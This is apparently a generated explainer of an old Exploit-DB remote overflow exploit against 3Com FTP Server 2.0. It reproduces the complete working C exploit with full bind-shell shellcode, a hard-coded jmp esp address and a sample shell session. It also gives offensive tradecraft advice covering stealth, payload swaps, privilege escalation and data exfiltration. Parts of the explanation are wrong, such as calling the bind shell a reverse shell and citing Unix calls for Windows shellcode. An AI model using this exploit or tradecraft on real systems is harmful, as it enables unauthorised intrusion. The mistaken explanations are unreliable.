Understanding the 3Com FTP Server 2.0 Remote Overflow Exploit

What this paper is

This paper details a remote buffer overflow vulnerability in the 3Com FTP Server version 2.0 (revision 10). The exploit, written by "c0d3r," demonstrates how to trigger this overflow to gain remote code execution, specifically establishing a reverse shell connection. The exploit is presented as a Proof of Concept (PoC) and was tested on Windows XP SP1.

Simple technical breakdown

The core of the vulnerability lies in how the FTP server handles user-supplied input, likely during the login process (username or password commands). The server doesn't properly check the size of the data it receives, allowing an attacker to send more data than the allocated buffer can hold. This overwrites adjacent memory, including crucial control data like return addresses.

The exploit crafts a malicious input string that:

1. Overwrites the return address: It replaces the legitimate return address on the stack with a pointer to attacker-controlled code.
2. Injects shellcode: This attacker-controlled code, known as shellcode, is designed to execute commands on the target system. In this case, it's a bind shell that listens on a specific port (4444) for incoming connections, effectively giving the attacker a command prompt.

The exploit uses a technique called "NOP sled" (No Operation instructions) to increase the chances of the program jumping to the shellcode, even if the exact landing address is slightly off.

Complete code and payload walkthrough

The provided C code implements the exploit. Let's break it down:

Header and Pragmas

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")

• #include <stdio.h>: Standard input/output functions (like printf).
• #include <stdlib.h>: Standard library functions (like malloc, exit).
• #include <string.h>: String manipulation functions (like strlen, memset).
• #include <winsock2.h>: Windows Sockets API for network communication.
• #pragma comment(lib, "ws2_32.lib"): Links the Winsock 2 library, necessary for network operations on Windows.

Defines and Variables

#define address 0x77A7EE6C // jmp esp lays in shell32.dll in my box
#define size 673 // 3 byte command + 235 byte NOP junk +
                           // 4 byte return address + 430 byte shellc0de

• #define address 0x77A7EE6C: This is the crucial return address that the exploit will overwrite. It points to a location in shell32.dll that contains a jmp esp instruction. This instruction tells the program to jump to the address currently held in the stack pointer (esp), which will be pointing to our injected shellcode. The specific address is system-dependent and was found on the author's Windows XP SP1 system.
• #define size 673: This defines the total size of the buffer that will be sent to the server. It's broken down as:
  • 3 bytes for the command (e.g., "PAS" for PASS).
  • 235 bytes for NOP sled.
  • 4 bytes for the overwritten return address.
  • 430 bytes for the shellcode.

Shellcode Definition

 char shellc0de[] = // some NOPS + shellcode bind port 4444
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x10\x5A\x4A\x33\xC9\x66"
// ... (rest of the shellcode bytes) ...
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";

• This is the actual payload that will be executed on the vulnerable server. It's a sequence of hexadecimal bytes.
  • The initial \x90 bytes represent NOP (No Operation) instructions. These are essentially "do nothing" instructions that the CPU will execute sequentially. They create a "NOP sled" which increases the probability of hitting the shellcode if the return address is slightly miscalculated.
  • The bytes following the NOPs constitute the actual shellcode. This specific shellcode is designed to:
    • Create a socket.
    • Bind it to port 4444.
    • Listen for an incoming connection.
    • Duplicate file descriptors (stdin, stdout, stderr) to the socket.
    • Execute a command shell (cmd.exe).
  • This results in a bind shell, meaning the vulnerable server will listen on port 4444, and when an attacker connects to that port, they will get a command prompt.

main Function

 int main (int argc, char *argv[]){

  unsigned char *recvbuf,*user,*pass;
  unsigned int rc,addr,sock,rc2 ;
  struct sockaddr_in tcp;
  struct hostent *hp;
  WSADATA wsaData;
  char buffer[size];
  unsigned short port;
  char *ptr;
  long *addr_ptr;
  int NOP_LEN = 200,i,x=0,f = 200;
  // ... (rest of the main function) ...
 }

• argc, argv: Command-line arguments. The exploit expects host, port, user, and pass.
• recvbuf, user, pass: Pointers for dynamically allocated buffers to store received data, username, and password.
• rc, addr, sock, rc2: Variables for socket operations and connection results.
• tcp: A sockaddr_in structure to hold the target server's address information.
• hp: A hostent structure to store resolved host information.
• wsaData: A WSADATA structure for Winsock initialization.
• buffer[size]: The main buffer that will be constructed to send to the server.
• port: The target port number.
• ptr, addr_ptr: Pointers used for constructing the exploit buffer.
• NOP_LEN, i, x, f: Loop counters and other integer variables.

Argument Handling

  if(argc < 5) {
      printf("\n-------- 3Com Ftp Server remote exploit by c0d3r --------\n");
   printf("-------- usage : 3com.exe host port user pass --------\n");
   printf("-------- eg: 3com.exe 127.0.0.1 21 c0d3r secret --------\n\n");
  exit(-1) ;
  }
  printf("\n-------- 3Com Ftp Server remote exploit by c0d3r --------\n\n");
  recvbuf = malloc(256);
  memset(recvbuf,0,256);

• Checks if the correct number of command-line arguments (at least 5: program name + host, port, user, pass) are provided. If not, it prints usage instructions and exits.
• Allocates memory for recvbuf and initializes it to zeros.

Exploit Buffer Construction

  //Creating exploit code
  printf("[*] building overflow string");
    memset(buffer,0,size);
       ptr = buffer;
       addr_ptr = (long *) ptr;
 
     for(i=0;i < size;i+=4){
   *(addr_ptr++) = address;
  }
   buffer[0] = 'C';buffer[1] = 'D';buffer[2] = ' ';
   for(i = 3;i != 235;i++){
   buffer[i] = 0x90;
  }
     i = 239;
  for(x = 0;x != strlen(shellc0de);x++,i++){
   buffer[i] = shellc0de[x];
  }
  buffer[size] = 0;

• memset(buffer,0,size);: Clears the buffer to all zeros.
• ptr = buffer; addr_ptr = (long *) ptr;: Sets up addr_ptr to point to the beginning of the buffer and casts it to a long pointer. This allows writing 4-byte values (addresses) directly.
• for(i=0;i < size;i+=4){ *(addr_ptr++) = address; }: This loop fills the beginning of the buffer with the address value (0x77A7EE6C). This is where the overwrite happens. The loop writes the address repeatedly, effectively filling the space intended for the return address and potentially beyond.
• buffer[0] = 'C';buffer[1] = 'D';buffer[2] = ' ';: This part is a bit unclear without knowing the exact FTP command being exploited. It seems to be prepending some characters, possibly related to the command itself or a placeholder. The comment 3 byte command suggests this might be part of a command like "PAS " or "USER ".
• for(i = 3;i != 235;i++){ buffer[i] = 0x90; }: This loop fills the buffer with NOP instructions (0x90) starting from index 3 up to index 234. This creates the NOP sled.
• i = 239; for(x = 0;x != strlen(shellc0de);x++,i++){ buffer[i] = shellc0de[x]; }: This loop copies the actual shellc0de into the buffer, starting at index 239. The NOP sled is followed by the shellcode.
• buffer[size] = 0;: Null-terminates the buffer, although it's not strictly necessary for sending raw bytes over a socket.

Username and Password Preparation

  user = malloc(256);
  memset(user,0,256);

  pass = malloc(256);
  memset(pass,0,256);

  sprintf(user,"user %s\r\n",argv[3]);
  sprintf(pass,"pass %s\r\n",argv[4]);

• Allocates memory for user and pass buffers.
• Formats the username and password strings to be sent to the FTP server, including the standard FTP command prefixes ("user " and "pass ") and carriage return/newline (\r\n) terminators.

Network Initialization (Winsock)

   if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
   printf("[-] WSAStartup failed !\n");
   exit(-1);
  }

• Initializes the Winsock library. This is required for any network programming on Windows.

Target Host Resolution

 hp = gethostbyname(argv[1]);
  if (!hp){
   addr = inet_addr(argv[1]);
  }
  if ((!hp) && (addr == INADDR_NONE) ){
   printf("[-] unable to resolve %s\n",argv[1]);
   exit(-1);
  }

• Tries to resolve the target hostname (argv[1]) using gethostbyname.
• If hostname resolution fails, it attempts to parse the input as an IP address using inet_addr.
• If both fail, it prints an error and exits.

Socket Creation

  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  if (!sock){
   printf("[-] socket() error...\n");
   exit(-1);
  }

• Creates a TCP socket (SOCK_STREAM) for IPv4 (AF_INET).

Target Address Setup

   if (hp != NULL)
   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
  else
   tcp.sin_addr.s_addr = addr;

  if (hp)
   tcp.sin_family = hp->h_addrtype;
  else
  tcp.sin_family = AF_INET;
  port=atoi(argv[2]);
  tcp.sin_port=htons(port);

• Populates the tcp structure with the target IP address (either from hp or addr).
• Sets the address family (sin_family).
• Converts the port number from string to integer (atoi) and then to network byte order (htons).

Connection and Exploit Sending

  
  printf("\n[*] attacking host %s\n" , argv[1]) ;
  
  Sleep(1000);
  
  printf("[*] packet size = %d byte\n" , sizeof(buffer));
  
  rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
  if(rc==0)
  {
    
     Sleep(1000) ;
  printf("[*] connected\n") ;
     rc2=recv(sock,recvbuf,256,0); // Receive banner
     printf("[*] sending username\n");
     send(sock,user,strlen(user),0);
     send(sock,'\n',1,0); // Send newline after username
     printf("[*] sending password\n");
     Sleep(1000);
  send(sock,pass,strlen(pass),0);
     send(sock,buffer,strlen(buffer),0); // Send the overflowed buffer
  send(sock,'\n',1,0); // Send newline after password/overflow
     printf("[*] exploit sent successfully try nc %s 4444\n" , argv[1]);
  }
  
  else {
      printf("[-] 3CDaemon is not listening .... \n");
 }
  shutdown(sock,1);
  closesocket(sock);

• printf("\n[*] attacking host %s\n" , argv[1]) ;: Informs the user about the target host.
• Sleep(1000);: Pauses for 1 second.
• printf("[*] packet size = %d byte\n" , sizeof(buffer));: Displays the size of the exploit payload.
• rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));: Attempts to connect to the target FTP server.
• if(rc==0): If the connection is successful:
  • Sleep(1000) ; printf("[*] connected\n") ;: Confirms connection.
  • rc2=recv(sock,recvbuf,256,0);: Receives the FTP server's banner message. This is standard FTP interaction.
  • send(sock,user,strlen(user),0); send(sock,'\n',1,0);: Sends the crafted username.
  • Sleep(1000); send(sock,pass,strlen(pass),0);: Pauses, then sends the crafted password.
  • send(sock,buffer,strlen(buffer),0); send(sock,'\n',1,0);: This is the critical step. It sends the buffer containing the overflow, the NOP sled, and the shellcode. The vulnerability is triggered here if the server processes the password (or potentially username) input without proper bounds checking.
  • printf("[*] exploit sent successfully try nc %s 4444\n" , argv[1]);: Informs the user that the exploit has been sent and suggests how to connect to the resulting shell using netcat (nc).
• else { printf("[-] 3CDaemon is not listening .... \n"); }: If the connection fails, it indicates the server might not be running or accessible.
• shutdown(sock,1); closesocket(sock);: Closes the socket connection.

Mapping list: code fragment/block -> practical purpose

• #include <winsock2.h>: Enables network communication functions.
• #define address 0x77A7EE6C: The target return address on the stack, pointing to jmp esp in shell32.dll.
• #define size 673: Total size of the crafted exploit payload.
• char shellc0de[] = ...: The actual payload bytes that will be executed on the target, creating a bind shell on port 4444.
• buffer[size]: The main buffer holding the exploit payload (NOP sled, return address, shellcode).
• for(i=0;i < size;i+=4){ *(addr_ptr++) = address; }: Overwrites the stack with the target return address.
• for(i = 3;i != 235;i++){ buffer[i] = 0x90; }: Creates the NOP sled for reliable shellcode execution.
• for(x = 0;x != strlen(shellc0de);x++,i++){ buffer[i] = shellc0de[x]; }: Injects the shellcode into the buffer.
• sprintf(user,"user %s\r\n",argv[3]);: Formats the username command.
• sprintf(pass,"pass %s\r\n",argv[4]);: Formats the password command.
• WSAStartup(...): Initializes the Windows networking stack.
• gethostbyname(...) / inet_addr(...): Resolves the target IP address.
• socket(...): Creates a network socket.
• connect(...): Establishes a connection to the target FTP server.
• send(sock,buffer,strlen(buffer),0);: Sends the crafted overflowed buffer to the server, triggering the vulnerability.

Shellcode/Payload Segments Explanation

The shellc0de is a sequence of bytes that, when executed by the target system's CPU, performs a specific task. While a full disassembly of this specific shellcode is complex and beyond the scope of a simple explanation, its purpose is clear: to establish a reverse shell.

The general steps a bind shellcode like this would perform are:

1. socket(): Create a network socket.
2. bind(): Associate the socket with a specific IP address and port (in this case, port 4444 on all interfaces).
3. listen(): Put the socket into listening mode, waiting for incoming connections.
4. accept(): Accept an incoming connection from a client.
5. dup2() (or similar): Redirect standard input (stdin), standard output (stdout), and standard error (stderr) to the accepted socket.
6. execve() (or similar): Execute a command interpreter (like cmd.exe on Windows) whose input and output are now connected to the network socket.

The specific bytes in the shellc0de array are machine code instructions for the x86 architecture that achieve these steps. The use of \x90 (NOP) at the beginning is a common technique to create a "NOP sled." If the exact jump address is slightly off, the CPU will execute the NOPs until it reaches the actual shellcode.

Practical details for offensive operations teams

• Required Access Level: Network access to the target FTP server is required. No local access or elevated privileges are needed on the target machine itself, as this is a remote exploit.
• Lab Preconditions:
  • A vulnerable 3Com FTP Server 2.0 (revision 10) instance must be running on a target machine. The exploit explicitly states it was tested on Windows XP SP1, so this is the most likely environment.
  • The FTP server must be accessible over the network from the attacker's machine.
  • A firewall must not be blocking the connection to the FTP port (default 21) or the bind shell port (4444).
• Tooling Assumptions:
  • A C compiler (like Visual C++ 6, as mentioned in the comments) to compile the exploit code.
  • netcat (or equivalent) on the attacker's machine to connect to the bind shell.
  • Network connectivity from the attacker's machine to the target.
• Execution Pitfalls:
  • ASLR/DEP: Modern operating systems employ Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP). These security features make fixed addresses like 0x77A7EE6C unreliable and prevent direct execution of shellcode from data segments. This exploit would likely fail on systems with these protections enabled.
  • Firewall Rules: The bind shell on port 4444 might be blocked by network firewalls.
  • Different OS/SP Versions: The address (0x77A7EE6C) is specific to the author's system (likely Windows XP SP1). Different Windows versions or service pack levels will have different DLL base addresses and function offsets, requiring the address to be re-found and updated.
  • Server Configuration: The FTP server might be configured to use different ports or have security measures that prevent this type of input.
  • Buffer Size Mismatch: The size constant (673) is an estimate. If the actual buffer size required to overflow and overwrite the return address is different, the exploit will fail.
  • Shellcode Evasion: Antivirus software might detect the shellcode.
• Tradecraft Considerations:
  • Reconnaissance: Identify the specific version of the 3Com FTP Server.
  • Target Analysis: Determine the operating system and service pack level to assess the likelihood of the exploit working and the need to find a new return address.
  • Payload Customization: If a bind shell is not feasible (e.g., port 4444 is blocked), the shellcode would need to be modified to create a reverse shell (where the target connects back to the attacker).
  • Stealth: Sending the exploit over standard FTP port 21 might be logged. Consider alternative delivery methods if stealth is paramount.
  • Post-Exploitation: Once a shell is obtained, immediately look for ways to stabilize the connection, escalate privileges, and exfiltrate data.

Where this was used and when

• Approximate Year: 2005. The exploit was published on February 17, 2005.
• Context: This exploit was likely used in the wild by attackers targeting organizations running the vulnerable 3Com FTP Server. It's a classic example of a remote code execution vulnerability that could be exploited for unauthorized access. It was also used by security researchers and ethical hackers for testing and demonstration purposes.

Defensive lessons for modern teams

• Patch Management: The most critical lesson is the importance of keeping all software, especially network-facing services like FTP servers, up-to-date with security patches. This vulnerability was patched by vendors.
• Input Validation: Developers must rigorously validate all user-supplied input to prevent buffer overflows. This includes checking lengths, types, and formats of data before processing.
• Secure Coding Practices: Employ secure coding guidelines to avoid common vulnerabilities like buffer overflows, format string bugs, and integer overflows.
• Network Segmentation and Firewalls: Implement strong network segmentation and firewall rules to limit the attack surface. Restrict access to services like FTP to only necessary ports and hosts. Block unused ports (like 4444) from external access.
• Intrusion Detection/Prevention Systems (IDS/IPS): Deploy IDS/IPS solutions that can detect and block exploit attempts based on known attack patterns.
• Endpoint Detection and Response (EDR): Modern EDR solutions can detect suspicious process behavior, such as unexpected network connections or the execution of shellcode, even if the initial exploit is successful.
• Vulnerability Scanning: Regularly scan your network for known vulnerabilities to identify and remediate systems running outdated or vulnerable software.
• Understanding Exploit Mechanisms: Defenders need to understand how common exploits work (like buffer overflows) to better identify indicators of compromise and develop effective defenses.

ASCII visual (if applicable)

This exploit involves a client-server interaction and memory manipulation. A simple flow diagram can illustrate the process:

+-----------------+       +-----------------------+
| Attacker Client |       | Vulnerable 3Com FTP   |
| (Exploit Exec)  |       | Server (Windows XP SP1)|
+-----------------+       +-----------------------+
        |                         |
        | 1. Connect (Port 21)    |
        |------------------------>|
        |                         |
        | 2. Send USER/PASS       |
        |    (with overflow)      |
        |------------------------>|
        |                         |
        | 3. Server crashes/      |
        |    executes shellcode   |
        |                         |
        | 4. Shellcode binds to   |
        |    Port 4444            |
        |                         |
        | 5. Attacker connects    |
        |    to Port 4444         |
        |<------------------------|
        |                         |
        | 6. Shell session        |
        |------------------------>|
        |                         |

Explanation:

1. The attacker's machine connects to the FTP server on its standard port (21).
2. The attacker sends a crafted username and password. The password field (or potentially username) contains the overflow data.
3. The vulnerable FTP server, upon receiving the oversized input, overwrites its internal buffers and the return address on the stack. The jmp esp instruction at the address causes execution to jump to the attacker's shellcode.
4. The shellcode executes, creating a listener on port 4444 on the server.
5. The attacker's machine then connects to port 4444 on the compromised server.
6. A command shell session is established between the attacker and the server.

Source references

• PAPER ID: 825
• PAPER TITLE: 3Com FTP Server 2.0 - Remote Overflow
• AUTHOR: c0d3r
• PUBLISHED: 2005-02-17
• KEYWORDS: Windows, remote
• PAPER URL: https://www.exploit-db.com/papers/825
• RAW URL: https://www.exploit-db.com/raw/825
• Advisory: http://secway.org/advisory/ad20041011.txt (Referenced in the exploit code comments)

Original Exploit-DB Content (Verbatim)

/* Email fixed brotha /str0ke */
/*
     3Com Ftp Server remote overflow exploit
     author : c0d3r "kaveh razavi" c0d3rz_team@yahoo.com
  package : 3CDaemon version 2.0 revision 10
  advisory : http://secway.org/advisory/ad20041011.txt
  company address : 3com.com
  it is just a simple PoC tested on winxp sp 1 and may not work on other systems .
  just a lame coded software that didnt cost to bother myself to develop
  the exploit code . every command has got overflow .
  compiled with visual c++ 6 : cl 3com.c
  greetz : LorD and NT of Iran Hackers Sabotages , irc.zirc.org #ihs
  Jamie of exploitdev (hey man how should I thank u with ur helps?),
  sIiiS and vbehzadan of hyper-security , pishi , redhat , araz , simorgh
  securiteam , roberto of zone-h , milw0rm (dont u see that my mail address has changed?)
  Lamerz :
  shervin_kesafat@yahoo.com with a fucked ass ! , konkoor ( will be dead soon !! )
  ashiyane digital lamerz team ( abroo har chi iranie bordin khak barsara ! )

/*
/*
D:\projects>3com.exe 127.0.0.1 21 c0d3r secret

-------- 3Com Ftp Server remote exploit by c0d3r --------

[*] building overflow string
[*] attacking host 127.0.0.1
[*] packet size = 673 byte
[*] connected
[*] sending username
[*] sending password
[*] exploit sent successfully try nc 127.0.0.1 4444

D:\projects>nc 127.0.0.1 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\3Com\3CDaemon>

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define address 0x77A7EE6C // jmp esp lays in shell32.dll in my box
#define size 673 // 3 byte command + 235 byte NOP junk +
                           // 4 byte return address + 430 byte shellc0de

 int main (int argc, char *argv[]){

 char shellc0de[] = // some NOPS + shellcode bind port 4444

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x10\x5A\x4A\x33\xC9\x66"
"\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";
  
  unsigned char *recvbuf,*user,*pass;
  unsigned int rc,addr,sock,rc2 ;
  struct sockaddr_in tcp;
  struct hostent *hp;
  WSADATA wsaData;
  char buffer[size];
  unsigned short port;
  char *ptr;
  long *addr_ptr;
  int NOP_LEN = 200,i,x=0,f = 200;
  if(argc < 5) {
      printf("\n-------- 3Com Ftp Server remote exploit by c0d3r --------\n");
   printf("-------- usage : 3com.exe host port user pass --------\n");
   printf("-------- eg: 3com.exe 127.0.0.1 21 c0d3r secret --------\n\n");
  exit(-1) ;
  }
  printf("\n-------- 3Com Ftp Server remote exploit by c0d3r --------\n\n");
  recvbuf = malloc(256);
  memset(recvbuf,0,256);
  
  //Creating exploit code
  printf("[*] building overflow string");
    memset(buffer,0,size);
       ptr = buffer;
       addr_ptr = (long *) ptr;
 
     for(i=0;i < size;i+=4){
   *(addr_ptr++) = address;
  }
   buffer[0] = 'C';buffer[1] = 'D';buffer[2] = ' ';
   for(i = 3;i != 235;i++){
   buffer[i] = 0x90;
  }
     i = 239;
  for(x = 0;x != strlen(shellc0de);x++,i++){
   buffer[i] = shellc0de[x];
  }
  buffer[size] = 0;
 
  //EO exploit code

  user = malloc(256);
  memset(user,0,256);

  pass = malloc(256);
  memset(pass,0,256);

  sprintf(user,"user %s\r\n",argv[3]);
  sprintf(pass,"pass %s\r\n",argv[4]);
  
   if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
   printf("[-] WSAStartup failed !\n");
   exit(-1);
  }
 hp = gethostbyname(argv[1]);
  if (!hp){
   addr = inet_addr(argv[1]);
  }
  if ((!hp) && (addr == INADDR_NONE) ){
   printf("[-] unable to resolve %s\n",argv[1]);
   exit(-1);
  }
  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  if (!sock){
   printf("[-] socket() error...\n");
   exit(-1);
  }
   if (hp != NULL)
   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
  else
   tcp.sin_addr.s_addr = addr;

  if (hp)
   tcp.sin_family = hp->h_addrtype;
  else
  tcp.sin_family = AF_INET;
  port=atoi(argv[2]);
  tcp.sin_port=htons(port);
   
  
  printf("\n[*] attacking host %s\n" , argv[1]) ;
  
  Sleep(1000);
  
  printf("[*] packet size = %d byte\n" , sizeof(buffer));
  
  rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
  if(rc==0)
  {
    
     Sleep(1000) ;
  printf("[*] connected\n") ;
     rc2=recv(sock,recvbuf,256,0);
     printf("[*] sending username\n");
     send(sock,user,strlen(user),0);
     send(sock,'\n',1,0);
     printf("[*] sending password\n");
     Sleep(1000);
  send(sock,pass,strlen(pass),0);
     send(sock,buffer,strlen(buffer),0);
  send(sock,'\n',1,0);
     printf("[*] exploit sent successfully try nc %s 4444\n" , argv[1]);
  }
  
  else {
      printf("[-] 3CDaemon is not listening .... \n");
 }
  shutdown(sock,1);
  closesocket(sock);
  

}

// milw0rm.com [2005-02-17]